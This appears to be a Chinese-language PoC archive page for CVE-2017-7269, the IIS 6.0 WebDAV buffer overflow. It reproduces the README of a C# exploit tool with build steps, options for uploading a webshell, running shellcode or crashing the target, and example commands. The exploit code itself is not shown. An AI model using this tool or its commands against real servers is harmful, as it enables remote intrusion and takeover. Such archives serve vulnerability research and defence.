目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%

CVE-2017-7269 PoC — Microsoft Internet Information Services 缓冲区错误漏洞

来源
关联漏洞
标题:Microsoft Internet Information Services 缓冲区错误漏洞 (CVE-2017-7269)
Description:Microsoft Windows Server 2003 R2是美国微软(Microsoft)公司发布的一套服务器操作系统。Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 Microsoft Windows Server 2003 R2中的IIS 6.0版本中的WebDAV服务的‘ScStoragePathFromUrl’函数存在缓冲区溢出漏洞。远程攻击者可通过发送特制的PROPFIND请求利用该漏洞执行任意代码。
Description
CVE-2017-7269 to webshell or shellcode loader
介绍
# cve-2017-7269 webshell and shellcode tool

### build

	csc cve-2017-7269.cs

### usage

	CVE-2017-7269 <url> [parms]

	Header:
	-h <host>       set host for [If] header
	-p <port>       set port for [If] header
	-s <scheme>     set scheme for [If] header
	-l <length>     length of physical path
	
	WebShell:
	-w <webshell>   upload webshell to server
	-wp <shellpath> path of webshell to save
	
	ShellCode:
	-c <shellcode>  execute the shellcode
	
	Misc:
	-t      test vulnerable only.
	-e      exit process when getshell or test
	-k      kill target(equals -e and -t)

### example

	CVE-2017-7269 http://192.168.1.1/
	CVE-2017-7269 http://192.168.1.1/ -l 19
	CVE-2017-7269 http://host.remote/ -h test.local -p 8080 -s https
	CVE-2017-7269 http://192.168.1.1/ -e -l 22 -w evil.asp -wp /webshell.asp
	CVE-2017-7269 http://192.168.1.1/ -c shellcode.bin


文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →